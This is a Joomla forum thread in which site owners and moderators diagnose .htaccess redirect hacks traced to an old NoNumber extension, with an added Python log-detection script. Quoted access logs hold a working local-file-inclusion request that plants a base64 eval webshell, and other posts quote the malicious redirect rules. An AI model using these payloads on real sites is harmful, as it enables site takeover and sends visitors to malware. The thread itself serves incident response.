Joomla .htaccess hacked to xxx.ru

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

MoonfireArt
Joomla! Explorer
Posts: 466
Joined: Wed Feb 29, 2012 3:27 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by MoonfireArt » Wed Apr 11, 2012 1:58 pm

BernardT wrote:
brinw05 wrote: ... but it's important that the NoNumber Framework extension (-set) is listed there in VEL, as the previous versions are known to have not one but several vulnerabilities, both LFI and RFI. Unfortunately, NoNumber is listed in most of the exploit-data sites, so its vulnerability is well documented and now used as a good target for malware-seeding attacks. The additional problem with NoNumber is that the components which are using it are easy to spot via a simple Google sweep or pentests on J! installations...
That sucks! Those extensions (and that Framework) saved me hours of coding. I would hate to think that I now have to change it all (Tabber and Slider are used extensively throughout the sites). A question though: since we do not have registered users or any way for people to post any information, would that lessen the vulnerability to these attacks?

Also, a warning to everyone. It seems these same hackers/spammers are now infiltrating Yahoo mail accounts. A company employee recently had her account and contact list hijacked to send out spam e-mails from her account to some of the same sites these redirects are going to. As I am sure Yahoo! takes its security very seriously, it just goes to show that anyone can be vulnerable. Step up your e-mail precautions!

mandville
Joomla! Master
Posts: 14789
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked to xxx.ru

Post by mandville » Wed Apr 11, 2012 2:30 pm

MoonfireArt wrote: A question though, since we do not have registered users or any way for people to post any information, would that lessen the vulnerability to these attacks?
In short, no.
MoonfireArt wrote: Also, a warning to everyone. It seems these same hackers/spammers are now infiltrating Yahoo mail accounts.
Slightly irrelevant to these discussions, as they have been attacking email accounts for years.
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

shwaran
Joomla! Apprentice
Posts: 29
Joined: Mon Apr 19, 2010 1:13 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by shwaran » Wed Apr 11, 2012 3:27 pm

MoonfireArt wrote:
BernardT wrote:
brinw05 wrote: ... but it's important that the NoNumber Framework extension (-set) is listed there in VEL, as the previous versions are known to have not one but several vulnerabilities, both LFI and RFI. Unfortunately, NoNumber is listed in most of the exploit-data sites, so its vulnerability is well documented and now used as a good target for malware-seeding attacks. The additional problem with NoNumber is that the components which are using it are easy to spot via a simple Google sweep or pentests on J! installations...
In my experience the NoNumber framework and extensions are vulnerabilities.

Here are my websites' details:

website - 1
Joomla! 2.5.4
obrss
J2XML Importer
JA News Pro Module
Lof ArticlesSlideShow Module
Content - 1Pixelout Audio Player

website - 2
Joomla! 2.5.4
obrss
J2XML Importer
JA News Pro Module
Lof ArticlesSlideShow Module
Content - 1Pixelout Audio Player
no number Advanced Module Manager
no number cache cleaner

Only website 2 was hacked and had its .htaccess changed.

Webdongle
Joomla! Master
Posts: 37261
Joined: Sat Apr 05, 2008 9:58 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by Webdongle » Wed Apr 11, 2012 3:37 pm

shwaran wrote:...
In my experience the NoNumber framework and extensions are vulnerabilities.
...

Only website 2 was hacked and had its .htaccess changed.
What version of Advanced Module Manager was on 'site 2'? The version with the known vulnerabilities?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein

Ace__
Joomla! Intern
Posts: 64
Joined: Thu Sep 27, 2007 1:42 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by Ace__ » Wed Apr 11, 2012 6:45 pm

Had my server hacked last week. Joomla 1.5.22. Seems to have been the NoNumber plugin that opened the door in my case too...

From the access.logs (IP of attacker and my domain hidden)


XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:28 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:29 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:30 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:31 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:32 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:33 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 3926 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:36 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:38 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:39 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:40 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:41 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:43 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:44 +0100] "POST /tmp/j.php HTTP/1.1" 200 9 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1) Gecko/20110403 Firefox/3.6a1pre" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:45 +0100] "POST /tmp/j.php HTTP/1.1" 200 - "-" "Mozilla/4.0 (Linux; Windows NT 5.0; ja; rv:2)" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:47 +0100] "GET /tmp/jos_almi.php HTTP/1.1" 200 56803 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2a1pre) Gecko/20090403 Firefox/3.6a1pre" www.mydomain.ie
So basically it placed a j.php file in the tmp folder and then a jos_almi.php file and from these created or overwrote a .htaccess file in every first level directory.

I've updated all sites to 1.5.26 but I think I will not use NoNumber in future (it was only for Admin Bar Docker).
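To turn the log excerpt above into a detection, here is an added example (not code from this thread or from any Joomla project) that parses Apache combined-format lines of the kind Ace__ posted, flags the traversal, null-byte and User-Agent injection traits they show, and correlates the later POST to the file named in the injected write. The IP 203.0.113.5, the host www.example.com and the base64 string 'QUJD' are constructed placeholders.

```python
"""Flag the LFI-to-webshell sequence seen in the access log above.

Added example (not the thread's or any Joomla project's code). Reads Apache
combined-format lines with the trailing virtual-host field the post shows.
"""
import re
from urllib.parse import unquote

# Apache combined log format, plus the trailing vhost field seen in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>.*)"(?: (?P<vhost>\S+))?$'
)
# Path named in an injected file_put_contents() call inside the User-Agent.
DROPPED_RE = re.compile(r"file_put_contents\(\s*'([^']+)'")

# Constructed sample modelled on the post: 203.0.113.5 / www.example.com are
# documentation placeholders and 'QUJD' stands in for the real base64 payload.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Apr/2012:22:44:28 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('QUJD'));?>" www.example.com
198.51.100.7 - - [03/Apr/2012:22:44:30 +0100] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux x86_64)" www.example.com
203.0.113.5 - - [03/Apr/2012:22:44:44 +0100] "POST /tmp/j.php HTTP/1.1" 200 9 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0)" www.example.com
203.0.113.5 - - [03/Apr/2012:22:44:47 +0100] "GET /tmp/jos_almi.php HTTP/1.1" 200 56803 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1)" www.example.com
"""


def lfi_indicators(path, ua):
    """Traits of one request that match the pattern in the log (empty if none)."""
    decoded = unquote(path)  # %2e%2e%2f -> ../ and %00 -> NUL, as the server sees them
    hits = []
    if 'nn_qp=' in decoded and 'file=' in decoded:
        hits.append('nn_qp file parameter')
    if '../' in decoded:
        hits.append('directory traversal')
    if '\x00' in decoded:
        hits.append('null byte truncation')
    if '/proc/self/environ' in decoded or '/proc/self/fd/' in decoded:
        hits.append('/proc/self include target')
    if '<?' in ua:
        hits.append('PHP open tag in User-Agent')
    if 'base64_decode' in ua or 'file_put_contents' in ua:
        hits.append('file write in User-Agent')
    return hits


def analyse(log_text):
    """Walk the log in order; return (line_no, ip, traits) for each suspicious request.

    A file named in an injected file_put_contents() is remembered per source IP,
    so the later POST to it is reported as use of the dropped file.
    """
    findings = []
    dropped = {}  # ip -> set of URL paths the attacker tried to write
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, ua = m['ip'], m['path'], m['ua']
        traits = lfi_indicators(path, ua)
        for target in DROPPED_RE.findall(ua):
            dropped.setdefault(ip, set()).add('/' + target.lstrip('/'))
        url = path.split('?', 1)[0]
        if url in dropped.get(ip, set()):
            traits.append('request to file named in earlier injected write')
        if url.startswith('/tmp/') and url.endswith('.php'):
            traits.append('PHP script served from /tmp/')  # Joomla's tmp dir should never serve code
        if traits:
            findings.append((n, ip, traits))
    return findings


if __name__ == '__main__':
    for line_no, ip, traits in analyse(SAMPLE_LOG):
        print(f'line {line_no} from {ip}: ' + ', '.join(traits))
```

Run against a real access log, the benign second line shows the filter stays quiet on ordinary Joomla requests while the first, third and fourth lines reproduce the three stages Ace__ describes.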

shwaran
Joomla! Apprentice
Posts: 29
Joined: Mon Apr 19, 2010 1:13 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by shwaran » Wed Apr 11, 2012 7:00 pm

Webdongle wrote:
shwaran wrote:...
In my experience the NoNumber framework and extensions are vulnerabilities.
...

Only website 2 was hacked and had its .htaccess changed.
What version of Advanced Module Manager was on 'site 2'? The version with the known vulnerabilities?
Advanced Module Manager 2.4.2

There is an updated version of this module available; however, I don't want to risk installing this extension again.

Bernard T
Joomla! Guru
Posts: 782
Joined: Thu Jun 29, 2006 11:44 am
Location: Hrvatska

Re: Joomla .htaccess hacked to xxx.ru

Post by Bernard T » Wed Apr 11, 2012 8:03 pm

Ace__ wrote:Joomla 1.5.22. Seems to have been the NoNumber plugin that opened the door in my case too...
From the access.logs


...... /index.php?nn_qp=1 ...
That's the earlier mentioned query string that makes your Joomlas such easy targets. Just one Google search and there is the list of possible "sitting ducks" :(

@ Mandville & PhilD ... since evidence is more and more clear that old NoNumber extensions are one of the main targets, would it be possible that you make a special note in VEL about it, something like:

"because of high number of attacks using old vulnerable versions of NoNumber extensions, it is strongly advised that you immediately upgrade your old NoNumber extension to the newest available version"

Many people with hijacked sites go to VEL and through the list, but the "white" background could be misleading and they over-jump it in the hurry of the situation in which they are...
VEL Team || Security Forum || PHP/Web Security Specialist || OWASP member
JAMSS author http://forum.joomla.org/viewtopic.php?f=621&t=777957
Twitter: @toplak

mandville
Joomla! Master
Posts: 14789
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked to xxx.ru

Post by mandville » Wed Apr 11, 2012 9:10 pm

Not all sites have NoNumber extensions installed.
Have those who do have NoNumber installed spoken to the developer?
The reasoning and notes on the NoNumber entries have been made clear as to the date and version of the extensions involved. For practical reasons, the VEL list is not updated with every new version.
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

mandville
Joomla! Master
Posts: 14789
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked to xxx.ru

Post by mandville » Wed Apr 11, 2012 9:13 pm

Ace__ wrote:Had me server hacked last week. Joomla 1.5.22. Seems to have been the NoNumber plugin that opened the door in my case too...
It could also have been your out of date install. Please contact the developer with your concerns, telling them the full system setup with versioning of Joomla and the extension.
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Bernard T
Joomla! Guru
Posts: 782
Joined: Thu Jun 29, 2006 11:44 am
Location: Hrvatska

Re: Joomla .htaccess hacked to xxx.ru

Post by Bernard T » Wed Apr 11, 2012 10:02 pm

VED suggestion - OK! :pop
mandville wrote:
Ace__ wrote:Had me server hacked last week. Joomla 1.5.22. Seems to have been the NoNumber plugin that opened the door in my case too...
It could also have been your out of date instal. ...
Well Mandville, the copy of the log that Ace__ presented here is undoubtedly clear: the file is being inserted with the NoNumber method, here, at this point:
Ace__ wrote: From the access.logs ...


 <? file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>"
VEL Team || Security Forum || PHP/Web Security Specialist || OWASP member
JAMSS author http://forum.joomla.org/viewtopic.php?f=621&t=777957
Twitter: @toplak

Webdongle
Joomla! Master
Posts: 37261
Joined: Sat Apr 05, 2008 9:58 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by Webdongle » Wed Apr 11, 2012 10:18 pm

BernardT wrote:.... the copy of the log that Ace__ presented here is undoubtedly clear - the file is being inserted with NoNumber method,...
But what version of NoNumber was it: the version that is known to be vulnerable, or the one that is said not to be vulnerable?

If the former then it does not prove nonumber is still vulnerable and is old news. But if the latter then it is significant.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein

mandville
Joomla! Master
Posts: 14789
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked to xxx.ru

Post by mandville » Wed Apr 11, 2012 10:36 pm

I have requested that NoNumber make an appearance here; note I did say that not all users had "no number" extensions.
It's also nice for the devs to inform both JED and VEL of any security releases they make.
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Bernard T
Joomla! Guru
Posts: 782
Joined: Thu Jun 29, 2006 11:44 am
Location: Hrvatska

Re: Joomla .htaccess hacked to xxx.ru

Post by Bernard T » Wed Apr 11, 2012 10:41 pm

mandville wrote: I have requested that NoNumber make an appearance here; note I did say that not all users had "no number" extensions.
It's also nice for the devs to inform both JED and VEL of any security releases they make.
An excellent idea! That might be clarifying for both sides...
VEL Team || Security Forum || PHP/Web Security Specialist || OWASP member
JAMSS author http://forum.joomla.org/viewtopic.php?f=621&t=777957
Twitter: @toplak

Ace__
Joomla! Intern
Posts: 64
Joined: Thu Sep 27, 2007 1:42 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by Ace__ » Thu Apr 12, 2012 8:35 am

The NoNumber Elements plugin I was using was 2.2.2 (Feb 2011). I believe the current version is 3.0.2. Incidentally the NoNumber RSS feed on VED is returning a 404.

I believe the exploit was discovered on Oct 10th 2011 and fixed on Oct 17th 2011. (Source)

Would this have meant that NoNumbers listing on VED would have gone RED and then WHITE within a few days?? What is the difference between white and green listings in VED? It does not say. The wording that is there does not read well (and I am a native English speaker).

PhilD
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA

Re: Joomla .htaccess hacked to xxx.ru

Post by PhilD » Thu Apr 12, 2012 1:32 pm

The nonumber CustoMenu updated version works now and so check back at the developers website to see if you still get the 404 error.

I have seen some extensions accessed in November 2011, and then nothing happened hack wise until March this year.

VEL
Red - bad version(s), not fixed; Blue - good, updated and fixed; No colour - talk to the developer.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

mcsmom
Joomla! Exemplar
Posts: 7985
Joined: Thu Aug 18, 2005 8:43 pm
Location: New York

Re: Joomla .htaccess hacked to xxx.ru

Post by mcsmom » Thu Apr 12, 2012 2:06 pm

I have spoken with someone who is at a big host who reports that 30/30 sites with this hack have some variation of extplorer installed (ninjaexplorer, joomlaextplorer etc). Do people in this thread have either those extensions or similar installed?
So we must fix our vision not merely on the negative expulsion of war, but upon the positive affirmation of peace. MLK 1964.
http://officialjoomlabook.com Get it at http://www.joomla.org/joomla-press-official-books.html Buy a book, support Joomla!.

PhilD
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA

Re: Joomla .htaccess hacked to xxx.ru

Post by PhilD » Thu Apr 12, 2012 4:17 pm

Don't be too quick to blame a file manager extension, especially if it is an up to date version. If access is gained to a site, one of the things that sometimes happens is that a file manager extension is installed to assist the hacker with adding files and changing things on your site. You have to find out if and/or when the file manager got installed. Many times people will have no clue about what their site actually contains, so it can be rather difficult to figure out when the file manager got there.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

X-Bit
Joomla! Apprentice
Posts: 17
Joined: Wed Oct 31, 2007 2:28 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by X-Bit » Thu Apr 12, 2012 4:59 pm

Hello @all!

After such an attack I restored a site by scanning / cleaning it thoroughly. As I am quite experienced in doing this work I am quite sure there is no (known) threat anymore. It is now some 2 weeks ago and no malicious alteration has been reported since then.

The only thing, as I already asked, is that some users receive timeouts and are unable to reach the site, regardless of high- or low-traffic hours. If they try to access the site appending /index.php they gain instant access.

I would like to know if somebody encountered the same problem.

Just for the records, customer had old eXtplorer and some actual NoNumber extensions on his site. Joomla version was 1.5.26. Unfortunately Logs had been disabled on his server, which I corrected for future analysis.

Ace__
Joomla! Intern
Posts: 64
Joined: Thu Sep 27, 2007 1:42 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by Ace__ » Thu Apr 12, 2012 5:12 pm

X-Bit wrote:some users receive timeouts and are unable to reach the site.
If they visited your site while the hack was active they will need to clear their cookies and browser cache before being able to visit your site again. The malicious redirect also placed a malicious cookie on visiting machines.

Bernard T
Joomla! Guru
Posts: 782
Joined: Thu Jun 29, 2006 11:44 am
Location: Hrvatska

Re: Joomla .htaccess hacked to xxx.ru

Post by Bernard T » Thu Apr 12, 2012 6:20 pm

Ace__ wrote:
X-Bit wrote:some users receive timeouts and are unable to reach the site.
If they visited your site while the hack was active they will need to clear their cookies and browser cache before being able to visit your site again. The malicious redirect also placed a malicious cookie on visiting machines.
Yes, exactly. As there were webserver (Apache) generated HTTP redirects used (301 - permanent), today's browsers tend to cache these redirects, and that's why...
VEL Team || Security Forum || PHP/Web Security Specialist || OWASP member
JAMSS author http://forum.joomla.org/viewtopic.php?f=621&t=777957
Twitter: @toplak

X-Bit
Joomla! Apprentice
Posts: 17
Joined: Wed Oct 31, 2007 2:28 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by X-Bit » Thu Apr 12, 2012 6:36 pm

That's true! I forgot about this one; I saw it on my system but did not think about it anymore... Thanks for pointing me in the right direction!

frankgill
Joomla! Intern
Posts: 53
Joined: Fri Mar 18, 2011 1:23 am
Location: Ireland

hacked

Post by frankgill » Fri Apr 13, 2012 9:38 am

I have been hacked and have found the offending file to be .htaccess, so I deleted it and then went to a Joomla pack I had on my hard drive to see if I could get the original .htaccess file, but all I found was the htaccess.txt file. If I can find the .htaccess (HTACCESS file extension) I hope that when I upload it to my directory the problem will be solved.

Has anyone a .htaccess (HTACCESS file extension) for Joomla 1.5.23 that they can share? I have tried to rename the htaccess.txt file but it will not let me. I have tried the explorer extension and the Akeeba wizard to unzip my backup and locate the file, but I can not find the file in the backup file. I do not want to do a full backup as yet as I do not know when I was hacked!!! (I know - long story)

joomlovenow
Joomla! Intern
Posts: 92
Joined: Thu Mar 22, 2012 1:15 am
Location: Norway

Re: hacked

Post by joomlovenow » Fri Apr 13, 2012 4:11 pm

Just rename the htaccess.txt file to .htaccess and upload it to your server.

mandville
Joomla! Master
Posts: 14789
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked to xxx.ru

Post by mandville » Fri Apr 13, 2012 10:29 pm

previous 2 posts merged to this topic
joomlovenow wrote:just rename the htaccess.txt file to .htaccess and upload it to your server.
Whitewash! It's not as simple as that, so perhaps follow the sticky called "before you post, read this" and other advice in this forum.
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

yaanimai
Joomla! Explorer
Posts: 349
Joined: Thu Jun 14, 2007 2:48 pm
Location: Coppell, Texas

Re: Joomla .htaccess hacked to xxx.ru

Post by yaanimai » Tue Apr 17, 2012 5:03 pm

BernardT,

I downloaded the script you posted, unzipped it & uploaded the 3 files to the root directory of my site but when I browse to http://www.mysite.com/jamss-0.1.2.php it runs for several minutes then it redirects to this page

http://www. xxxxx . ru/ in.cgi?4 (added spaces & x's so as not to post link to malicious site)

Am I doing something wrong?

PhilD
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA

Re: Joomla .htaccess hacked to xxx.ru

Post by PhilD » Tue Apr 17, 2012 8:47 pm

Your site is hacked and you are going to have to at minimum delete any files within the Joomla /tmp directory (a most likely place) and correct the .htaccess file. Until the htaccess file is corrected and the hack that is modifying the htaccess file is removed, you will continue to be redirected to malware sites when requesting anything on your site. The .htaccess files are parsed by the server before any other site file is, so you can never reach the script while the htaccess file has the malware code in it. If you remove this code without removing the hack files the redirect code will be put back upon first site access.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

Wrinasellers
Joomla! Apprentice
Posts: 21
Joined: Thu Apr 15, 2010 11:51 pm

hacked by sas-air.xx and pin-se.xx

Post by Wrinasellers » Fri Apr 20, 2012 7:09 pm

Hello to all A little help Please.

My site is being redirected.
I have changed the file permissions (per my server admin - GoDaddy - to 705).
I have deleted the added script at the top and bottom of the page in all the .htaccess files, and when I remove them they reappear in all my main directories' .htaccess, for common Joomla directory files only. (Directories that I have created are not attacked.)
THE TOP CODE:::
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu||web-archiv)\.(.*)
RewriteRule ^(.*)$ http://pin-se.xx/acu?11 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://pin-se.xx/acu?11 [R=301,L]
</IfModule>

THE BOTTOM CODE:::
ErrorDocument 400 http://pin-Se.xx/acu?11
ErrorDocument 401 http://pin-se.xx/acu?11
ErrorDocument 403 http://pin-se.xx/acu?11
ErrorDocument 404 http://pin-se.xx/acu?11
ErrorDocument 500 http://pin-se.xx/acu?11
THE CODE CONTINUOUSLY REAPPEARS EVEN IF DELETED FROM THE MAIN .htaccess.

Apparently this is a running script in one of my Joomla product downloads... Any help???

thanks so much

Wrina
Last edited by mandville on Fri Apr 20, 2012 7:22 pm, edited 1 time in total.
Reason: broke links, removed excessive code

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14789
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: hacked by sas-air.xx and pin-se.xx

Post by mandville » Fri Apr 20, 2012 7:23 pm

my first offer of help would be to use the forum search . there you will find a major discussion on this hack.
I was going to link to the topic but will just merge this post onto the end of it.
I suggest you read ALL the information in the posts for how to deal with these (and similar hacks)
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Wrinasellers
Joomla! Apprentice
Posts: 21
Joined: Thu Apr 15, 2010 11:51 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by Wrinasellers » Sat Apr 21, 2012 12:50 am

If you have this Error below in your .htaccess files it is going to take some work on your part. Steps I took to solve the problem are at the end of the code below::

There are two codes, this one is at the top... there is another code at the bottom of the .htaccess files. Click/hold and scan to see them -- they are to the far right
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo||allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://air-sas.xx/space?7 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|x|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://air-sas.xx/space?7 [R=301,L]
</IfModule>

Steps
1) I upgraded from Joomla 1.5.25 to 1.5.26
2) Called GoDaddy (ISP); they had to go above my root directory to disable the affected .htaccess file.
3) I had to delete all the .htaccess files from all my directories (Joomla 1st level directories were the only ones affected). If you can not delete all your .htaccess files this will not work for you. Deleting just the code does not work. (I tried this twice before I learned this)

4) Delete modules that you are unsure about.

5) Clear your ISP hosted temp files / backups / cache of all .htaccess, or else all the .htaccess files will be rewritten... again and again.

6) If you have stored any zip files from your modules/plugins/components on your server, place them somewhere else, because I have yet to figure out which module actually has the script in it.

7) Clear your browser history and look again for the redirects.
Check Firefox (upgrade)... Google worked fine but Firefox was affected and rerouting the script's calls to: air-sas.xx and sasrep.xx.....

